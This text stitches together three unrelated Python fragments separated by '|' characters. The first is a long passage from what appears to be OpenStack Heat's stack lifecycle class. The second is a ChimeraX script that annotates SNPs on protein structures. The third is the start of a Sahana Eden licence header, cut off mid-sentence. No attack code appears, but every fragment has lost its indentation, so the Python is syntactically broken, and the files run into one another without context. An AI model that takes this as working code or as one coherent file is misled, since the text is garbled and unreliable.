stack = stack_object.Stack.get_by_id(self.context, self.id)
if stack is not None:
values = {'action': self.action,
'status': self.status,
'status_reason': self.status_reason}
self._send_notification_and_add_event()
if self.convergence:
# do things differently for convergence
updated = stack_object.Stack.select_and_update(
self.context, self.id, values,
exp_trvsl=self.current_traversal)
return updated
else:
stack.update_and_save(values)
def _send_notification_and_add_event(self):
notification.send(self)
self._add_event(self.action, self.status, self.status_reason)
LOG.info(_LI('Stack %(action)s %(status)s (%(name)s): '
'%(reason)s'),
{'action': self.action,
'status': self.status,
'name': self.name,
'reason': self.status_reason})
def persist_state_and_release_lock(self, engine_id):
"""Persist stack state to database and release stack lock"""
if self.id is None:
return
stack = stack_object.Stack.get_by_id(self.context, self.id)
if stack is not None:
values = {'action': self.action,
'status': self.status,
'status_reason': self.status_reason}
self._send_notification_and_add_event()
stack.persist_state_and_release_lock(self.context, self.id,
engine_id, values)
@property
def state(self):
"""Returns state, tuple of action, status."""
return (self.action, self.status)
def timeout_secs(self):
"""Return the stack action timeout in seconds."""
if self.timeout_mins is None:
return cfg.CONF.stack_action_timeout
return self.timeout_mins * 60
def preview_resources(self):
"""Preview the stack with all of the resources."""
return [resource.preview()
for resource in six.itervalues(self.resources)]
def _store_resources(self):
for r in reversed(self.dependencies):
if r.action == r.INIT:
r._store()
@profiler.trace('Stack.create', hide_args=False)
@reset_state_on_error
def create(self):
"""Create the stack and all of the resources."""
def rollback():
if not self.disable_rollback and self.state == (self.CREATE,
self.FAILED):
self.delete(action=self.ROLLBACK)
self._store_resources()
creator = scheduler.TaskRunner(
self.stack_task, action=self.CREATE,
reverse=False, post_func=rollback,
error_wait_time=cfg.CONF.error_wait_time)
creator(timeout=self.timeout_secs())
def _adopt_kwargs(self, resource):
data = self.adopt_stack_data
if not data or not data.get('resources'):
return {'resource_data': None}
return {'resource_data': data['resources'].get(resource.name)}
@scheduler.wrappertask
def stack_task(self, action, reverse=False, post_func=None,
error_wait_time=None,
aggregate_exceptions=False, pre_completion_func=None):
"""A task to perform an action on the stack.
All of the resources are traversed in forward or reverse dependency
order.
:param action: action that should be executed with stack resources
:param reverse: define if action on the resources need to be executed
in reverse order (resources - first and then res dependencies )
:param post_func: function that need to be executed after
action complete on the stack
:param error_wait_time: time to wait before cancelling all execution
threads when an error occurred
:param aggregate_exceptions: define if exceptions should be aggregated
:param pre_completion_func: function that need to be executed right
before action completion. Uses stack ,action, status and reason as
input parameters
"""
try:
lifecycle_plugin_utils.do_pre_ops(self.context, self,
None, action)
except Exception as e:
self.state_set(action, self.FAILED, e.args[0] if e.args else
'Failed stack pre-ops: %s' % six.text_type(e))
if callable(post_func):
post_func()
return
self.state_set(action, self.IN_PROGRESS,
'Stack %s started' % action)
stack_status = self.COMPLETE
reason = 'Stack %s completed successfully' % action
action_method = action.lower()
# If a local _$action_kwargs function exists, call it to get the
# action specific argument list, otherwise an empty arg list
handle_kwargs = getattr(self,
'_%s_kwargs' % action_method,
lambda x: {})
@functools.wraps(getattr(resource.Resource, action_method))
def resource_action(r):
# Find e.g resource.create and call it
handle = getattr(r, action_method)
return handle(**handle_kwargs(r))
action_task = scheduler.DependencyTaskGroup(
self.dependencies,
resource_action,
reverse,
error_wait_time=error_wait_time,
aggregate_exceptions=aggregate_exceptions)
try:
yield action_task()
except scheduler.Timeout:
stack_status = self.FAILED
reason = '%s timed out' % action.title()
except Exception as ex:
# We use a catch-all here to ensure any raised exceptions
# make the stack fail. This is necessary for when
# aggregate_exceptions is false, as in that case we don't get
# ExceptionGroup, but the raw exception.
# see scheduler.py line 395-399
stack_status = self.FAILED
reason = 'Resource %s failed: %s' % (action, six.text_type(ex))
if pre_completion_func:
pre_completion_func(self, action, stack_status, reason)
self.state_set(action, stack_status, reason)
if callable(post_func):
post_func()
lifecycle_plugin_utils.do_post_ops(self.context, self, None, action,
(self.status == self.FAILED))
@profiler.trace('Stack.check', hide_args=False)
@reset_state_on_error
def check(self):
self.updated_time = oslo_timeutils.utcnow()
checker = scheduler.TaskRunner(
self.stack_task, self.CHECK,
post_func=self.supports_check_action,
error_wait_time=cfg.CONF.error_wait_time,
aggregate_exceptions=True)
checker()
def supports_check_action(self):
def is_supported(stack, res):
if res.has_nested():
return res.nested().supports_check_action()
else:
return hasattr(res, 'handle_%s' % self.CHECK.lower())
supported = [is_supported(self, res)
for res in six.itervalues(self.resources)]
if not all(supported):
msg = ". '%s' not fully supported (see resources)" % self.CHECK
reason = self.status_reason + msg
self.state_set(self.CHECK, self.status, reason)
return all(supported)
@profiler.trace('Stack._backup_stack', hide_args=False)
def _backup_stack(self, create_if_missing=True):
"""Backup the stack.
Get a Stack containing any in-progress resources from the previous
stack state prior to an update.
"""
s = stack_object.Stack.get_by_name_and_owner_id(
self.context,
self._backup_name(),
owner_id=self.id)
if s is not None:
LOG.debug('Loaded existing backup stack')
return self.load(self.context, stack=s)
elif create_if_missing:
kwargs = self.get_kwargs_for_cloning()
kwargs['owner_id'] = self.id
del(kwargs['prev_raw_template_id'])
prev = type(self)(self.context, self.name, copy.deepcopy(self.t),
**kwargs)
prev.store(backup=True)
LOG.debug('Created new backup stack')
return prev
else:
return None
@profiler.trace('Stack.adopt', hide_args=False)
@reset_state_on_error
def adopt(self):
"""Adopt existing resources into a new stack."""
def rollback():
if not self.disable_rollback and self.state == (self.ADOPT,
self.FAILED):
# enter the same flow as abandon and just delete the stack
for res in six.itervalues(self.resources):
res.abandon_in_progress = True
self.delete(action=self.ROLLBACK, abandon=True)
creator = scheduler.TaskRunner(
self.stack_task,
action=self.ADOPT,
reverse=False,
error_wait_time=cfg.CONF.error_wait_time,
post_func=rollback)
creator(timeout=self.timeout_secs())
@profiler.trace('Stack.update', hide_args=False)
@reset_state_on_error
def update(self, newstack, event=None):
"""Update the stack.
Compare the current stack with newstack,
and where necessary create/update/delete the resources until
this stack aligns with newstack.
Note update of existing stack resources depends on update
being implemented in the underlying resource types
Update will fail if it exceeds the specified timeout. The default is
60 minutes, set in the constructor
"""
self.updated_time = oslo_timeutils.utcnow()
updater = scheduler.TaskRunner(self.update_task, newstack,
event=event)
updater()
@profiler.trace('Stack.converge_stack', hide_args=False)
def converge_stack(self, template, action=UPDATE, new_stack=None):
"""Update the stack template and trigger convergence for resources."""
if action not in [self.CREATE, self.ADOPT]:
# no back-up template for create action
self.prev_raw_template_id = getattr(self.t, 'id', None)
# switch template and reset dependencies
self.t = template
self.reset_dependencies()
self._resources = None
if action is not self.CREATE:
self.updated_time = oslo_timeutils.utcnow()
if new_stack is not None:
self.disable_rollback = new_stack.disable_rollback
self.timeout_mins = new_stack.timeout_mins
self._set_param_stackid()
self.tags = new_stack.tags
if new_stack.tags:
stack_tag_object.StackTagList.set(self.context, self.id,
new_stack.tags)
else:
stack_tag_object.StackTagList.delete(self.context, self.id)
self.action = action
self.status = self.IN_PROGRESS
self.status_reason = 'Stack %s started' % self.action
# generate new traversal and store
previous_traversal = self.current_traversal
self.current_traversal = uuidutils.generate_uuid()
# we expect to update the stack having previous traversal ID
stack_id = self.store(exp_trvsl=previous_traversal)
if stack_id is None:
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, aborting stack %(action)s"),
{'name': self.name, 'trvsl_id': previous_traversal,
'action': self.action})
return
self._send_notification_and_add_event()
# delete the prev traversal sync_points
if previous_traversal:
sync_point.delete_all(self.context, self.id, previous_traversal)
# TODO(later): lifecycle_plugin_utils.do_pre_ops
self._converge_create_or_update()
def _converge_create_or_update(self):
current_resources = self._update_or_store_resources()
self._compute_convg_dependencies(self.ext_rsrcs_db, self.dependencies,
current_resources)
# Store list of edges
self.current_deps = {
'edges': [[rqr, rqd] for rqr, rqd in
self.convergence_dependencies.graph().edges()]}
stack_id = self.store()
if stack_id is None:
# Failed concurrent update
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, aborting stack %(action)s"),
{'name': self.name, 'trvsl_id': self.current_traversal,
'action': self.action})
return
LOG.info(_LI('convergence_dependencies: %s'),
self.convergence_dependencies)
# create sync_points for resources in DB
for rsrc_id, is_update in self.convergence_dependencies:
sync_point.create(self.context, rsrc_id,
self.current_traversal, is_update,
self.id)
# create sync_point entry for stack
sync_point.create(
self.context, self.id, self.current_traversal, True, self.id)
leaves = set(self.convergence_dependencies.leaves())
if not any(leaves):
self.mark_complete()
else:
for rsrc_id, is_update in self.convergence_dependencies.leaves():
if is_update:
LOG.info(_LI("Triggering resource %s for update"), rsrc_id)
else:
LOG.info(_LI("Triggering resource %s for cleanup"),
rsrc_id)
input_data = sync_point.serialize_input_data({})
self.worker_client.check_resource(self.context, rsrc_id,
self.current_traversal,
input_data, is_update,
self.adopt_stack_data)
def rollback(self):
old_tmpl_id = self.prev_raw_template_id
if old_tmpl_id is None:
rollback_tmpl = tmpl.Template.create_empty_template(
version=self.t.version)
else:
rollback_tmpl = tmpl.Template.load(self.context, old_tmpl_id)
self.prev_raw_template_id = None
stack_id = self.store()
if stack_id is None:
# Failed concurrent update
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, not trigerring rollback."),
{'name': self.name,
'trvsl_id': self.current_traversal})
return
self.converge_stack(rollback_tmpl, action=self.ROLLBACK)
def _get_best_existing_rsrc_db(self, rsrc_name):
candidate = None
if self.ext_rsrcs_db:
for id, ext_rsrc in self.ext_rsrcs_db.items():
if ext_rsrc.name != rsrc_name:
continue
if ext_rsrc.current_template_id == self.t.id:
# Rollback where the previous resource still exists
candidate = ext_rsrc
break
elif (ext_rsrc.current_template_id ==
self.prev_raw_template_id):
# Current resource is otherwise a good candidate
candidate = ext_rsrc
return candidate
def _update_or_store_resources(self):
self.ext_rsrcs_db = self._db_resources_get(key_id=True)
curr_name_translated_dep = self.dependencies.translate(lambda res:
res.name)
rsrcs = {}
def update_needed_by(res):
new_requirers = set(
rsrcs[rsrc_name].id for rsrc_name in
curr_name_translated_dep.required_by(res.name)
)
old_requirers = set(res.needed_by) if res.needed_by else set()
needed_by = old_requirers | new_requirers
res.needed_by = list(needed_by)
for rsrc in reversed(self.dependencies):
existing_rsrc_db = self._get_best_existing_rsrc_db(rsrc.name)
if existing_rsrc_db is None:
update_needed_by(rsrc)
rsrc.current_template_id = self.t.id
rsrc._store()
rsrcs[rsrc.name] = rsrc
else:
update_needed_by(existing_rsrc_db)
resource.Resource.set_needed_by(
existing_rsrc_db, existing_rsrc_db.needed_by
)
rsrcs[existing_rsrc_db.name] = existing_rsrc_db
return rsrcs
def _compute_convg_dependencies(self, existing_resources,
current_template_deps, current_resources):
def make_graph_key(rsrc):
return current_resources[rsrc.name].id, True
dep = current_template_deps.translate(make_graph_key)
if existing_resources:
for rsrc_id, rsrc in existing_resources.items():
dep += (rsrc_id, False), None
for requirement in rsrc.requires:
if requirement in existing_resources:
dep += (requirement, False), (rsrc_id, False)
if rsrc.replaces in existing_resources:
dep += (rsrc.replaces, False), (rsrc_id, False)
if (rsrc.id, True) in dep:
dep += (rsrc_id, False), (rsrc_id, True)
self._convg_deps = dep
@property
def convergence_dependencies(self):
if self._convg_deps is None:
current_deps = ([tuple(i), (tuple(j) if j is not None else None)]
for i, j in self.current_deps['edges'])
self._convg_deps = dependencies.Dependencies(edges=current_deps)
return self._convg_deps
@scheduler.wrappertask
def update_task(self, newstack, action=UPDATE, event=None):
if action not in (self.UPDATE, self.ROLLBACK, self.RESTORE):
LOG.error(_LE("Unexpected action %s passed to update!"), action)
self.state_set(self.UPDATE, self.FAILED,
"Invalid action %s" % action)
return
try:
lifecycle_plugin_utils.do_pre_ops(self.context, self,
newstack, action)
except Exception as e:
self.state_set(action, self.FAILED, e.args[0] if e.args else
'Failed stack pre-ops: %s' % six.text_type(e))
return
if self.status == self.IN_PROGRESS:
if action == self.ROLLBACK:
LOG.debug("Starting update rollback for %s" % self.name)
else:
self.state_set(action, self.FAILED,
'State invalid for %s' % action)
return
# Save a copy of the new template. To avoid two DB writes
# we store the ID at the same time as the action/status
prev_tmpl_id = self.prev_raw_template_id
bu_tmpl = copy.deepcopy(newstack.t)
self.prev_raw_template_id = bu_tmpl.store()
self.action = action
self.status = self.IN_PROGRESS
self.status_reason = 'Stack %s started' % action
self._send_notification_and_add_event()
self.store()
if prev_tmpl_id is not None:
raw_template_object.RawTemplate.delete(self.context, prev_tmpl_id)
if action == self.UPDATE:
# Oldstack is useless when the action is not UPDATE , so we don't
# need to build it, this can avoid some unexpected errors.
kwargs = self.get_kwargs_for_cloning()
oldstack = Stack(self.context, self.name, copy.deepcopy(self.t),
**kwargs)
backup_stack = self._backup_stack()
existing_params = environment.Environment({env_fmt.PARAMETERS:
self.t.env.params})
previous_template_id = None
try:
update_task = update.StackUpdate(
self, newstack, backup_stack,
rollback=action == self.ROLLBACK,
error_wait_time=cfg.CONF.error_wait_time)
updater = scheduler.TaskRunner(update_task)
self.parameters = newstack.parameters
self.t.files = newstack.t.files
self.t.env = newstack.t.env
self.disable_rollback = newstack.disable_rollback
self.timeout_mins = newstack.timeout_mins
self._set_param_stackid()
self.tags = newstack.tags
if newstack.tags:
stack_tag_object.StackTagList.set(self.context, self.id,
newstack.tags)
else:
stack_tag_object.StackTagList.delete(self.context, self.id)
try:
updater.start(timeout=self.timeout_secs())
yield
while not updater.step():
if event is None or not event.ready():
yield
else:
message = event.wait()
self._message_parser(message)
finally:
self.reset_dependencies()
if action in (self.UPDATE, self.RESTORE, self.ROLLBACK):
self.status_reason = 'Stack %s completed successfully' % action
self.status = self.COMPLETE
except scheduler.Timeout:
self.status = self.FAILED
self.status_reason = 'Timed out'
except (ForcedCancel, exception.ResourceFailure) as e:
# If rollback is enabled when resource failure occurred,
# we do another update, with the existing template,
# so we roll back to the original state
if self._update_exception_handler(
exc=e, action=action, update_task=update_task):
yield self.update_task(oldstack, action=self.ROLLBACK)
return
else:
LOG.debug('Deleting backup stack')
backup_stack.delete(backup=True)
# flip the template to the newstack values
previous_template_id = self.t.id
self.t = newstack.t
template_outputs = self.t[self.t.OUTPUTS]
self.outputs = self.resolve_static_data(template_outputs)
# Don't use state_set to do only one update query and avoid race
# condition with the COMPLETE status
self.action = action
self._send_notification_and_add_event()
if self.status == self.FAILED:
# Since template was incrementally updated based on existing and
# new stack resources, we should have user params of both.
existing_params.load(newstack.t.env.user_env_as_dict())
self.t.env = existing_params
self.t.store(self.context)
backup_stack.t.env = existing_params
backup_stack.t.store(self.context)
self.store()
if previous_template_id is not None:
raw_template_object.RawTemplate.delete(self.context,
previous_template_id)
lifecycle_plugin_utils.do_post_ops(self.context, self,
newstack, action,
(self.status == self.FAILED))
def _update_exception_handler(self, exc, action, update_task):
"""Handle exceptions in update_task.
Decide if we should cancel tasks or not. Also decide if we should
rollback or not, depend on disable rollback flag if force rollback flag
not triggered.
:returns: a boolean for require rollback flag.
"""
self.status_reason = six.text_type(exc)
self.status = self.FAILED
if action != self.UPDATE:
return False
if isinstance(exc, ForcedCancel):
update_task.updater.cancel_all()
return exc.with_rollback or not self.disable_rollback
return not self.disable_rollback
def _message_parser(self, message):
if message == rpc_api.THREAD_CANCEL:
raise ForcedCancel(with_rollback=False)
elif message == rpc_api.THREAD_CANCEL_WITH_ROLLBACK:
raise ForcedCancel(with_rollback=True)
def _delete_backup_stack(self, stack):
# Delete resources in the backup stack referred to by 'stack'
def failed(child):
return (child.action == child.CREATE and
child.status in (child.FAILED, child.IN_PROGRESS))
def copy_data(source_res, destination_res):
if source_res.data():
for key, val in six.iteritems(source_res.data()):
destination_res.data_set(key, val)
for key, backup_res in stack.resources.items():
# If UpdateReplace is failed, we must restore backup_res
# to existing_stack in case of it may have dependencies in
# these stacks. curr_res is the resource that just
# created and failed, so put into the stack to delete anyway.
backup_res_id = backup_res.resource_id
curr_res = self.resources.get(key)
if backup_res_id is not None and curr_res is not None:
curr_res_id = curr_res.resource_id
if (any(failed(child) for child in
self.dependencies[curr_res]) or
curr_res.status in
(curr_res.FAILED, curr_res.IN_PROGRESS)):
# If child resource failed to update, curr_res
# should be replaced to resolve dependencies. But this
# is not fundamental solution. If there are update
# failer and success resources in the children, cannot
# delete the stack.
# Stack class owns dependencies as set of resource's
# objects, so we switch members of the resource that is
# needed to delete it.
self.resources[key].resource_id = backup_res_id
self.resources[key].properties = backup_res.properties
copy_data(backup_res, self.resources[key])
stack.resources[key].resource_id = curr_res_id
stack.resources[key].properties = curr_res.properties
copy_data(curr_res, stack.resources[key])
stack.delete(backup=True)
def _try_get_user_creds(self):
# There are cases where the user_creds cannot be returned
# due to credentials truncated when being saved to DB.
# Ignore this error instead of blocking stack deletion.
user_creds = None
try:
user_creds = ucreds_object.UserCreds.get_by_id(self.user_creds_id)
except exception.Error as err:
LOG.exception(err)
pass
return user_creds
def _delete_credentials(self, stack_status, reason, abandon):
# Cleanup stored user_creds so they aren't accessible via
# the soft-deleted stack which remains in the DB
# The stack_status and reason passed in are current values, which
# may get rewritten and returned from this method
if self.user_creds_id:
user_creds = self._try_get_user_creds()
# If we created a trust, delete it
if user_creds is not None:
trust_id = user_creds.get('trust_id')
if trust_id:
try:
# If the trustor doesn't match the context user the
# we have to use the stored context to cleanup the
# trust, as although the user evidently has
# permission to delete the stack, they don't have
# rights to delete the trust unless an admin
trustor_id = user_creds.get('trustor_user_id')
if self.context.user_id != trustor_id:
LOG.debug("Context user_id doesn't match "
"trustor, using stored context")
sc = self.stored_context()
sc.clients.client('keystone').delete_trust(
trust_id)
else:
self.clients.client('keystone').delete_trust(
trust_id)
except Exception as ex:
LOG.exception(ex)
stack_status = self.FAILED
reason = ("Error deleting trust: %s" %
six.text_type(ex))
# Delete the stored credentials
try:
ucreds_object.UserCreds.delete(self.context,
self.user_creds_id)
except exception.NotFound:
LOG.info(_LI("Tried to delete user_creds that do not exist "
"(stack=%(stack)s user_creds_id=%(uc)s)"),
{'stack': self.id, 'uc': self.user_creds_id})
try:
self.user_creds_id = None
self.store()
except exception.NotFound:
LOG.info(_LI("Tried to store a stack that does not exist %s"),
self.id)
# If the stack has a domain project, delete it
if self.stack_user_project_id and not abandon:
try:
keystone = self.clients.client('keystone')
keystone.delete_stack_domain_project(
project_id=self.stack_user_project_id)
except Exception as ex:
LOG.exception(ex)
stack_status = self.FAILED
reason = "Error deleting project: %s" % six.text_type(ex)
return stack_status, reason
@profiler.trace('Stack.delete', hide_args=False)
@reset_state_on_error
def delete(self, action=DELETE, backup=False, abandon=False):
"""Delete all of the resources, and then the stack itself.
The action parameter is used to differentiate between a user
initiated delete and an automatic stack rollback after a failed
create, which amount to the same thing, but the states are recorded
differently.
Note abandon is a delete where all resources have been set to a
RETAIN deletion policy, but we also don't want to delete anything
required for those resources, e.g the stack_user_project.
"""
if action not in (self.DELETE, self.ROLLBACK):
LOG.error(_LE("Unexpected action %s passed to delete!"), action)
self.state_set(self.DELETE, self.FAILED,
"Invalid action %s" % action)
return
stack_status = self.COMPLETE
reason = 'Stack %s completed successfully' % action
self.state_set(action, self.IN_PROGRESS, 'Stack %s started' %
action)
backup_stack = self._backup_stack(False)
if backup_stack:
self._delete_backup_stack(backup_stack)
if backup_stack.status != backup_stack.COMPLETE:
errs = backup_stack.status_reason
failure = 'Error deleting backup resources: %s' % errs
self.state_set(action, self.FAILED,
'Failed to %s : %s' % (action, failure))
return
snapshots = snapshot_object.Snapshot.get_all(self.context,
self.id)
for snapshot in snapshots:
self.delete_snapshot(snapshot)
snapshot_object.Snapshot.delete(self.context, snapshot.id)
if not backup:
try:
lifecycle_plugin_utils.do_pre_ops(self.context, self,
None, action)
except Exception as e:
self.state_set(action, self.FAILED,
e.args[0] if e.args else
'Failed stack pre-ops: %s' % six.text_type(e))
return
action_task = scheduler.DependencyTaskGroup(self.dependencies,
resource.Resource.destroy,
reverse=True)
try:
scheduler.TaskRunner(action_task)(timeout=self.timeout_secs())
except exception.ResourceFailure as ex:
stack_status = self.FAILED
reason = 'Resource %s failed: %s' % (action, six.text_type(ex))
except scheduler.Timeout:
stack_status = self.FAILED
reason = '%s timed out' % action.title()
# If the stack delete succeeded, this is not a backup stack and it's
# not a nested stack, we should delete the credentials
if stack_status != self.FAILED and not backup and not self.owner_id:
stack_status, reason = self._delete_credentials(stack_status,
reason,
abandon)
try:
self.state_set(action, stack_status, reason)
except exception.NotFound:
LOG.info(_LI("Tried to delete stack that does not exist "
"%s "), self.id)
if not backup:
lifecycle_plugin_utils.do_post_ops(self.context, self,
None, action,
(self.status == self.FAILED))
if stack_status != self.FAILED:
# delete the stack
try:
stack_object.Stack.delete(self.context, self.id)
except exception.NotFound:
LOG.info(_LI("Tried to delete stack that does not exist "
"%s "), self.id)
self.id = None
@profiler.trace('Stack.suspend', hide_args=False)
@reset_state_on_error
def suspend(self):
"""Suspend the stack.
Invokes handle_suspend for all stack resources.
Waits for all resources to become SUSPEND_COMPLETE then declares the
stack SUSPEND_COMPLETE.
Note the default implementation for all resources is to do nothing
other than move to SUSPEND_COMPLETE, so the resources must implement
handle_suspend for this to have any effect.
"""
# No need to suspend if the stack has been suspended
if self.state == (self.SUSPEND, self.COMPLETE):
LOG.info(_LI('%s is already suspended'), six.text_type(self))
return
self.updated_time = oslo_timeutils.utcnow()
sus_task = scheduler.TaskRunner(
self.stack_task,
action=self.SUSPEND,
reverse=True,
error_wait_time=cfg.CONF.error_wait_time)
sus_task(timeout=self.timeout_secs())
@profiler.trace('Stack.resume', hide_args=False)
@reset_state_on_error
def resume(self):
"""Resume the stack.
Invokes handle_resume for all stack resources.
Waits for all resources to become RESUME_COMPLETE then declares the
stack RESUME_COMPLETE.
Note the default implementation for all resources is to do nothing
other than move to RESUME_COMPLETE, so the resources must implement
handle_resume for this to have any effect.
"""
# No need to resume if the stack has been resumed
if self.state == (self.RESUME, self.COMPLETE):
LOG.info(_LI('%s is already resumed'), six.text_type(self))
return
self.updated_time = oslo_timeutils.utcnow()
sus_task = scheduler.TaskRunner(
self.stack_task,
action=self.RESUME,
reverse=False,
error_wait_time=cfg.CONF.error_wait_time)
sus_task(timeout=self.timeout_secs())
@profiler.trace('Stack.snapshot', hide_args=False)
@reset_state_on_error
def snapshot(self, save_snapshot_func):
"""Snapshot the stack, invoking handle_snapshot on all resources."""
self.updated_time = oslo_timeutils.utcnow()
sus_task = scheduler.TaskRunner(
self.stack_task,
action=self.SNAPSHOT,
reverse=False,
error_wait_time=cfg.CONF.error_wait_time,
pre_completion_func=save_snapshot_func)
sus_task(timeout=self.timeout_secs())
@profiler.trace('Stack.delete_snapshot', hide_args=False)
def delete_snapshot(self, snapshot):
"""Remove a snapshot from the backends."""
for name, rsrc in six.iteritems(self.resources):
snapshot_data = snapshot.data
if snapshot_data:
data = snapshot.data['resources'].get(name)
scheduler.TaskRunner(rsrc.delete_snapshot, data)()
@profiler.trace('Stack.restore', hide_args=False)
@reset_state_on_error
def restore(self, snapshot):
"""Restore the given snapshot.
Invokes handle_restore on all resources.
"""
self.updated_time = oslo_timeutils.utcnow()
env = environment.Environment(snapshot.data['environment'])
files = snapshot.data['files']
template = tmpl.Template(snapshot.data['template'],
env=env, files=files)
newstack = self.__class__(self.context, self.name, template,
timeout_mins=self.timeout_mins,
disable_rollback=self.disable_rollback)
for name, defn in six.iteritems(
template.resource_definitions(newstack)):
rsrc = resource.Resource(name, defn, self)
data = snapshot.data['resources'].get(name)
handle_restore = getattr(rsrc, 'handle_restore', None)
if callable(handle_restore):
defn = handle_restore(defn, data)
template.add_resource(defn, name)
newstack.parameters.set_stack_id(self.identifier())
updater = scheduler.TaskRunner(self.update_task, newstack,
action=self.RESTORE)
updater()
@profiler.trace('Stack.output', hide_args=False)
def output(self, key):
"""Get the value of the specified stack output."""
value = self.outputs[key].get('Value', '')
try:
return function.resolve(value)
except Exception as ex:
self.outputs[key]['error_msg'] = six.text_type(ex)
return None
def restart_resource(self, resource_name):
"""Restart the resource specified by resource_name.
stop resource_name and all that depend on it
start resource_name and all that depend on it
"""
deps = self.dependencies[self[resource_name]]
failed = False
for res in reversed(deps):
try:
scheduler.TaskRunner(res.destroy)()
except exception.ResourceFailure as ex:
failed = True
LOG.error(_LE('Resource %(name)s delete failed: %(ex)s'),
{'name': res.name, 'ex': ex})
for res in deps:
if not failed:
try:
res.state_reset()
scheduler.TaskRunner(res.create)()
except exception.ResourceFailure as ex:
LOG.exception(_LE('Resource %(name)s create failed: '
'%(ex)s'), {'name': res.name, 'ex': ex})
failed = True
else:
res.state_set(res.CREATE, res.FAILED,
'Resource restart aborted')
# TODO(asalkeld) if any of this fails we Should
# restart the whole stack
def get_availability_zones(self):
nova = self.clients.client('nova')
if self._zones is None:
self._zones = [
zone.zoneName for zone in
nova.availability_zones.list(detailed=False)]
return self._zones
def set_stack_user_project_id(self, project_id):
self.stack_user_project_id = project_id
self.store()
@profiler.trace('Stack.create_stack_user_project_id', hide_args=False)
def create_stack_user_project_id(self):
project_id = self.clients.client(
'keystone').create_stack_domain_project(self.id)
self.set_stack_user_project_id(project_id)
@profiler.trace('Stack.prepare_abandon', hide_args=False)
def prepare_abandon(self):
return {
'name': self.name,
'id': self.id,
'action': self.action,
'environment': self.env.user_env_as_dict(),
'files': self.t.files,
'status': self.status,
'template': self.t.t,
'resources': dict((res.name, res.prepare_abandon())
for res in six.itervalues(self.resources)),
'project_id': self.tenant_id,
'stack_user_project_id': self.stack_user_project_id,
'tags': self.tags,
}
def resolve_static_data(self, snippet):
try:
return self.t.parse(self, snippet)
except AssertionError:
raise
except Exception as ex:
raise exception.StackValidationFailed(
message=encodeutils.safe_decode(six.text_type(ex)))
def reset_resource_attributes(self):
# nothing is cached if no resources exist
if not self._resources:
return
# a change in some resource may have side-effects in the attributes
# of other resources, so ensure that attributes are re-calculated
for res in six.itervalues(self.resources):
res.attributes.reset_resolved_values()
def has_cache_data(self, resource_name):
return (self.cache_data is not None and
self.cache_data.get(resource_name) is not None)
def cache_data_reference_id(self, resource_name):
return self.cache_data.get(
resource_name, {}).get('reference_id')
def cache_data_resource_attribute(self, resource_name, attribute_key):
return self.cache_data.get(
resource_name, {}).get('attrs', {}).get(attribute_key)
def cache_data_resource_all_attributes(self, resource_name):
attrs = self.cache_data.get(resource_name, {}).get('attributes', {})
return attrs
def mark_complete(self):
"""Mark the update as complete.
This currently occurs when all resources have been updated; there may
still be resources being cleaned up, but the Stack should now be in
service.
"""
LOG.info(_LI('[%(name)s(%(id)s)] update traversal %(tid)s complete'),
{'name': self.name, 'id': self.id,
'tid': self.current_traversal})
reason = 'Stack %s completed successfully' % self.action
updated = self.state_set(self.action, self.COMPLETE, reason)
if not updated:
return
self.purge_db()
def purge_db(self):
"""Cleanup database after stack has completed/failed.
1. Delete previous raw template if stack completes successfully.
2. Deletes all sync points. They are no longer needed after stack
has completed/failed.
3. Delete the stack if the action is DELETE.
"""
if (self.prev_raw_template_id is not None and
self.status != self.FAILED):
prev_tmpl_id = self.prev_raw_template_id
self.prev_raw_template_id = None
stack_id = self.store()
if stack_id is None:
# Failed concurrent update
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, aborting stack purge"),
{'name': self.name,
'trvsl_id': self.current_traversal})
return
raw_template_object.RawTemplate.delete(self.context, prev_tmpl_id)
sync_point.delete_all(self.context, self.id, self.current_traversal)
if (self.action, self.status) == (self.DELETE, self.COMPLETE):
try:
stack_object.Stack.delete(self.context, self.id)
except exception.NotFound:
pass
def time_elapsed(self):
"""Time elapsed in seconds since the stack operation started."""
start_time = timeutils.round_to_seconds(self.updated_time or
self.created_time)
nowish = timeutils.round_to_seconds(datetime.datetime.utcnow())
return (nowish - start_time).seconds
def time_remaining(self):
"""Time left before stack times out."""
return self.timeout_secs() - self.time_elapsed()
def has_timed_out(self):
"""Returns True if this stack has timed-out."""
if self.status == self.IN_PROGRESS:
return self.time_elapsed() > self.timeout_secs()
return False
|
# if you are seeing this file as text in a web browser, you need to configure
# chimerax as a helper application.
# Python code for chimerax files to display proteins with SNPs annotated.
# Due scoping bug in exec coding from chimerax files (1.3 alpha release and
# earlier), can only have one function and must import into function's local
# namespace.
def displayPdb(pdbSpec, snps):
"""pdbSpec can be a pdbId or a URL of a PDB format file.
snps is list of (snpId, chain, snpPos, [isPrimary])"""
from chimera import runCommand
from chimera.selection import OSLSelection
runCommand("close all")
if pdbSpec.find("://") >= 0:
runCommand("open %s" % pdbSpec)
else:
runCommand("open pdb:%s" % pdbSpec)
# hide all models/sub-models, NMR will only show first model
runCommand("select #*:*.*")
runCommand("~display sel")
runCommand("~select")
# get model spec to use, testing for sub-models, as is the case with NMR
sel = OSLSelection("#0.1")
if len(sel.atoms()) > 0:
modelSpec = "#0.1"
else:
modelSpec = "#0"
caSpec = "%s:.*@CA" % modelSpec
# display ribbons
runCommand("ribbon %s" % caSpec)
runCommand("ribbackbone %s" % caSpec)
runCommand("focus %s" % caSpec)
for snp in snps:
(snpId, chain, snpPos) = snp[0:3]
if ((len(snp) > 3) and snp[3]):
color = "red"
else:
color = "gold"
spec = "%s:%s.%s@CA" % (modelSpec, snpPos, chain)
runCommand("color %s %s" % (color, spec))
runCommand("setattr r label \"%s\" %s" % (snpId, spec))
|
# -*- coding: utf-8 -*-
""" Sahana Eden Inventory Model
@copyright: 2009-2014 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
